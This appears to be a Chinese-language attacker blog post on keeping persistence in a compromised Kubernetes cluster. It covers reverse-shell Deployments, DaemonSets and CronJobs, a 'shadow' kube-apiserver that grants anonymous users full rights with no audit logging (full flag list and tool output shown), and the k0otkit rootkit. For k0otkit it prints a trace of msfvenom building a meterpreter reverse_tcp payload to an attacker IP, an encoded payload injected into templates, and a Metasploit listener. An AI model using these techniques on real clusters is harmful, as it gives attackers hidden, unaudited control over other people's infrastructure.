前言
通过各种方法获得Kubernetes集群中的mastes或者node如何进行权限维持,从而进步渗透利用?比如像linux、windows那样进行?
此处以四种方法展开
控制器利用
创建容器时, 通过启用DaemonSet、Deployment,可以使容器和子容器即使被删除了也能够进步恢复重启,以实现权限维持的效果
涉及相关概念:
ReplicationController(RC):确保在任何时候都有特定数量的Pod处于运行状态
Replication Set(RS):此处推荐使用RS和Deployment代替RC,实际上RS和RC的功能基本一致,目前唯一的一个区别就是RC只支持基于等式的selector
Deployment:实现出来的效果和职责同RC一样,可以理解为RC的升级版本
Deployment
编写反弹shell的yaml文件即可
node1、node2都将反弹shell如下
期间对创建出来的pod进行删除后,deployment将自动创建恢复pod,以再次实现反弹shell权限维持
DaemonSet
同理操作即可,轮流弹shell效果相同
shadowapiserver利用
此处自行部署的shadowapiserver该apiserver同集群内现有的apiserver具备相同功能,同时进步开启了k8s的权限,接收匿名请求且不保存日志,进步使得攻击者能够无痕迹的管理整个集群
查看当前的api-server信息如下
寻找脆弱点,确认如下
直接部署shadowapiserver,效果如下
2022/03/31 06:20:04 shadow api-server deploy success!
shadow api-server pod name:kube-apiserver-master-shadow, namespace:kube-system, node name:master
listening insecure-port: 0.0.0.0:9443
listening secure-port: 0.0.0.0:9444 enabled all privilege for system:anonymous user
go further run `cdk kcurl anonymous get http://your-node-intranet-ip:9443/api` to takeover cluster with none audit logs!
在看眼部署出来的shadow,确认部署成功后的shadowapiserver
相关实现功能配置信息如下
kube-apiserver
--advertise-address=192.168.3.19
--allow-privileged=true
--authorization-mode=AlwaysAllow
--client-ca-file=/etc/kubernetes/pki/ca.crt
--enable-admission-plugins=NodeRestriction
--enable-bootstrap-token-auth=true
--etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt
--etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt
--insecure-bind-address=0.0.0.0
--anonymous-auth=true
--etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key
--etcd-servers=https://127.0.0.1:2379
--insecure-port=9443
--kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt
--kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key
--kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
--proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt
--proxy-client-key-file=/etc/kubernetes/pki/front-proxy-client.key
--requestheader-allowed-names=front-proxy-client
--requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt
--requestheader-extra-headers-prefix=X-Remote-Extra-
--requestheader-group-headers=X-Remote-Group
--requestheader-username-headers=X-Remote-User
--secure-port=9444
--service-account-key-file=/etc/kubernetes/pki/sa.pub
--service-cluster-ip-range=10.1.0.0/16
--tls-cert-file=/etc/kubernetes/pki/apiserver.crt
--tls-private-key-file=/etc/kubernetes/pki/apiserver.key
此处部署成功后,后续我们都可以用这个新的api进行操作
直接获取各类token信息
同理kubectl也不需要认证
cronjob
用于执行周期性的动作,通过yaml部署以实现周期性的反弹shell,创建计划任务的yaml
创建成功效果&yaml中反弹shell信息如下
K0otkit
技术细节查看:https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw
项目下载:https://github.com/Metarget/k0otkit
下载并赋予项目文件权限,修改ip&端口
生成kootkit,并进步执行反弹shell监听
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─
+ ATTACKER_IP=192.168.3.11
+ ATTACKER_PORT=20227
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=20227 LHOST=192.168.3.11 -f elf -o mrt
++ base64 -w 0
++ tr -d '\n'
++ xxd -p mrt
+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_remote_template.sh
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444
msf6 exploit(multi/handler) >
上传并执行在攻击机生成的k0otkit.sh文件
执行后效果如下,会在kube-system下的kube-proxy进行修改
上线效果如下
